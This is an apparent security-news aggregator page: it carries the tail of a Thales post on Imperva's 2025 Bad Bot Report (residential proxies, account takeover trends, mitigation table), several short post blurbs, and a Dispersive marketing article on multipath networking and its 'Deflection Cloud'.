Cybercriminals use residential proxies to disguise malicious bot traffic as legitimate user activity by routing it through residential IP addresses usually associated with home internet connections. This makes it harder for security systems to detect their malicious activities because residential IPs are often viewed as trustworthy. Imperva’s research revealed that 21% of bot attacks use residential proxies provided by ISPs, allowing bad actors to blend in with genuine user traffic and put a spoke in the detection wheel.

ATO and the Power of AI

Also, the number of Account Takeover (ATO) attacks has surged dramatically, rising by 40% since last year and by 54% in the past three years. This surge could be down to threat actors using AI and ML to automate credential stuffing and phishing, making them progressively sophisticated and more complicated to uncover.

The financial services sector was the most targeted industry for account takeover (ATO) attacks, accounting for 22% of all incidents, followed by Telecoms and ISPs with 18%, and Computing and IT with 17%.

A slew of AI tools—ChatGPT, ByteSpider Bot, ClaudeBot, Google Gemini, Perplexity AI, Cohere AI, Apple Bot, and others—are also turning the way users interact with their favorite brands on its head. Students are learning differently, employees working more efficiently, and content is being created faster than ever. On the flip side, these tools are also being used as a new attack vector for malicious actors, with ByteSpider Bot coming top and responsible for 54% of GenAI-enabled attacks.

Recommendations and Solutions

The report also offers a wide range of recommendations to help businesses protect themselves. The table below summarizes these recommendations and maps them to Thales solutions.

Recommendation Thales Solution Identify bot threats during products launches and on high-risk cases Imperva Advanced Bot Protection Secure APIs, mobile apps and authentication to prevent unauthorized access Imperva API Security Block outdated browsers and restrict user-agent access. Block known proxy services to stop bots masking their activity. Imperva Advanced Bot Protection Monitor for unusual patterns signaling bot activity. Imperva Web Application Firewall Track login failures and API requests to prevent credential stuffing attacks. Imperva Account Takeover Protection Enforce MFA to prevent account takeovers. Thales Multi-Factor Authentication Solutions Use AI-driven solutions to adapt to evolving automated threats. Imperva Advanced Bot Protection Rotate mitigation strategies to prevent bots from learning your defenses Imperva Application Security Solutions

For more information and to read the full research findings, download the full 2025 Bad Bot Report.

Identity & Access Management

Tim Chang | Vice President, Application Security Products
More About This Author > Schema {
"@context": "https://schema.org",
"@type": "BlogPosting",
"mainEntityOfPage": {
"@type": "WebPage",
"@id": "https://cpl.thalesgroup.com/blog/access-management/ai-bots-internet-traffic-imperva-2025-report"
},
"headline": "AI Bots Overtake the Web: Imperva 2025 Bad Bot Report",
"description": "Discover how AI bots now drive over half of internet traffic. Explore 2025 Imperva Bad Bot Report findings, attack trends, and security recommendations.",
"image": "",
"author": {
"@type": "Person",
"name": "Tim Chang",
"url": ""
},
"publisher": {
"@type": "Organization",
"name": "Thales Group",
"description": "The world relies on Thales to protect and secure access to your most sensitive data and software wherever it is created, shared, or stored. Whether building an encryption strategy, licensing software, providing trusted access to the cloud, or meeting compliance mandates, you can rely on Thales to secure your digital transformation.",
"url": "https://cpl.thalesgroup.com",
"logo": "https://cpl.thalesgroup.com/sites/default/files/content/footer/thaleslogo-white.png",
"sameAs": [
"https://www.facebook.com/ThalesCloudSec",
"https://www.twitter.com/ThalesCloudSec",
"https://www.linkedin.com/company/thalescloudsec",
"https://www.youtube.com/ThalesCloudSec"
]
},
"datePublished": "2025-04-22",
"dateModified": "2025-04-22"
}

basic

The post The AI Bot Epidemic: The Imperva 2025 Bad Bot Report appeared first on Security Boulevard.

via the comic humor & dry wit of Randall Munroe, creator of XKCD

Permalink

The post Randall Munroe’s XKCD ‘Anchor Screws’ appeared first on Security Boulevard.

The majority — 11 out of 15 — of the top Common Vulnerabilities and Exposures (CVEs) in CISA’s most recent annual Cybersecurity Advisory (CSA) were initially exploited as zero days. 

The post Zero-Day Attack Prevention with Contrast ADR | Real-Time Detection of Zero-Day Exploits of Unknown Vulnerabilities | Contrast Security appeared first on Security Boulevard.

AppOmni and Splunk SaaS work together to elevate SaaS security with enriched insights, streamlined investigations, and advanced AI-driven detection.

The post AppOmni and Splunk SaaS: A Unified Front for Enhanced Security Insights appeared first on AppOmni.

The post AppOmni and Splunk SaaS: A Unified Front for Enhanced Security Insights appeared first on Security Boulevard.

We are thrilled to announce that the 2025 Sonatype Elevate Awards are officially open for submissions.

The post ​Elevate your organization’s success: Submissions now open for the 2025 Sonatype Elevate Awards appeared first on Security Boulevard.

Author/Presenter: Harriet Farlow

Our sincere appreciation to BSidesLV, and the Presenters/Authors for publishing their erudite Security BSidesLV24 content. Originating from the conference’s events located at the Tuscany Suites & Casino; and via the organizations YouTube channel.

Permalink

The post BSidesLV24 – Common Ground – On Your Ocean’s 11 Team, I’m the AI Guy (or Girl) appeared first on Security Boulevard.

2 min readAs machine-to-machine communication eclipses human access, Aembit's secretless approach to non-human identity is gaining industry recognition.

The post KuppingerCole Names Aembit a “Rising Star” for Non-Human IAM appeared first on Aembit.

The post KuppingerCole Names Aembit a “Rising Star” for Non-Human IAM appeared first on Security Boulevard.

We live in a world obsessed with speed and reliability. Whether it's streaming our favorite shows, conducting mission-critical business operations, or simply browsing the web, we demand seamless connectivity. This has led to the rise of many SD-WAN and router providers touting multipath solutions – the promise of using multiple network paths simultaneously to boost performance and ensure resilience.

Not all multipath is equal, or even located in the same places

But let's be honest, not all multipaths are created equal. You might think you're leveraging the full potential of your network with traditional gateway-level load balancing, and while that's a good starting point, it's only scratching the surface.

To truly unlock the power of multipath, you need something more, something revolutionary: the Deflection Cloud from Dispersive. Figure 1 below depicts the benefits of applying multipath using the Dispersive deflection cloud at various pop locations vs the traditional SD-WAN VPN point to point approach. Optimizing traffic in the middle has a more dramatic effect on typical performance due to ISP oversubscription at peering points.

Figure 1. Multipath at both local gateways and the Trusted Cloud Edge (TCE) with Dispersive

Think of traditional gateway load balancing as having multiple lanes on a highway, but all the traffic decisions are made at the on-ramp. The gateway decides which lane each car takes based on pre-defined rules or simple metrics. While this can distribute traffic and offer some redundancy, it's inherently limited. You need a capability of Distributing traffic in the middle of the internet (at intersections that are optimized).

Why gateway-level load balancing alone falls short:

• Limited Real-time Adaptability: Gateways typically make routing decisions based on static configurations or coarse-grained, aggregated metrics. They lack granular, real-time visibility into individual path conditions like latency, jitter, and packet loss of paths outside their “normal” routes. If one lane on our highway suddenly becomes congested further down the road, the cars already in that lane are stuck, and the gateway might continue to direct new traffic into the bottleneck.

• Inability to React to Transient Issues: Network conditions are dynamic. Microbursts of congestion, temporary link degradation, or even localized interference can significantly impact application performance. Gateway-level load balancing often reacts too slowly, if at all, to these fleeting issues, leading to dropped packets and application slowdowns. They are also inherently unable to affect the traffic in their core network transport layers, outside typical routing concepts or single-hop gateway interface optimizations which aren’t effective at a more abstract core network transit level.

• Lack of True Path Diversity at the Packet Level: Gateway load balancing usually operates at the flow or packet level (e.g., based on source/destination IP and port) and is limited to its own localized traffic control domain. This means all packets belonging to a single application flow are still typically confined to a single underlying path. If that path experiences problems, the entire application suffers. There's no ability to dynamically shift individual packets across different paths in the backend transit areas to optimize for real-time conditions beyond the reach of the gateway – e.g. you are still beholden to your ISP. 

• Limited Security Agility: In a world of evolving cyber threats, the ability to dynamically shift traffic across diverse and geographically dispersed paths adds a significant layer of security. Gateway-level load balancing offers limited capabilities in this regard.

Enter the Dispersive difference: multipath with the Deflection Cloud

Dispersive Stealth Networking takes multipath to an entirely new dimension with our innovative Deflection Cloud. Imagine our highway analogy again, but this time, instead of static on-ramp decisions, you have a dynamic, intelligent air traffic control system constantly monitoring the conditions of every lane, every inch of the road. This is the essence of the Deflection Cloud (Figure 1 below).

Figure 2. Deflection Cloud – Deflects that relay traffic and obfuscate parties

Here's how Dispersive's multipath with the Deflection Cloud surpasses simple gateway-level load balancing:

• Granular, Real-time Packet-Level Intelligence: The Deflection Cloud continuously monitors the performance characteristics of multiple diverse network paths – wired, wireless, cellular, even satellite – at a per-packet level. It measures latency, jitter, packet loss, and other critical metrics in real time, providing an unprecedented level of insight into network conditions.

• Dynamic, Intelligent Packet Steering: Based on this real-time intelligence, the Deflection Cloud dynamically steers individual packets across the optimal available paths. If one path experiences congestion or degradation, only the affected packets are instantly rerouted to healthier paths, ensuring application performance remains consistent and uninterrupted. This is like our air traffic control system instantly rerouting individual cars around any emerging traffic jams.

• Unmatched Resilience and Reliability: By actively utilizing multiple paths and intelligently shifting traffic away from problematic links in milliseconds, Dispersive's solution offers unparalleled resilience. Even if one or more underlying network connections experience outages, the application remains operational, seamlessly leveraging the remaining healthy paths.

• Enhanced Performance and Lower Latency: By always choosing the best performing path for each packet, Dispersive significantly reduces latency and improves application throughput. This is especially critical for real-time applications like video conferencing, VoIP, and interactive gaming.

• Superior Security Posture: The Deflection Cloud inherently enhances security by distributing traffic across multiple disparate paths, making it significantly harder for attackers to intercept or disrupt communications. Furthermore, Dispersive's technology can incorporate sophisticated security policies and dynamically shift traffic to avoid potential threats.
  

Download: Secure Your Edge: The Future of CloudWAN Security White Paper

The proof is in the performance

Dispersive's multipath with the Deflection Cloud isn't just a theoretical improvement; it delivers tangible benefits in real-world deployments. Customers experience:

• Increased application availability and uptime.
• Improved application performance and responsiveness.
• Reduced latency and jitter for real-time applications.
• Enhanced security and resilience against network disruptions.
• Greater flexibility and agility in leveraging diverse network infrastructure.

Don't settle for basic multipath. Gateway-level load balancing is a step in the right direction, but it lacks the intelligence and granularity to truly unlock the potential of your network. If you're serious about achieving seamless connectivity, superior performance, and unwavering reliability, you need the Deflection Cloud from Dispersive.

Your multipath isn't my multipath without it. It's time to experience the difference Learn more about Dispersive and the power of the Deflection Cloud today! Please reach out to schedule a private consultation to learn more.

Additional Reading

Explore more blogs by Lawrence Pingree.

=> Your Network Is Showing - Time to Go Stealth

=> Secure AI Workspaces Need More Than a VPN

=> When Good Tools Go Bad: Dual-Use in Cybersecurity

Header image courtesy of rhythms on Freeimages.com.

The post Not All Multipath Is Created Equal appeared first on Security Boulevard.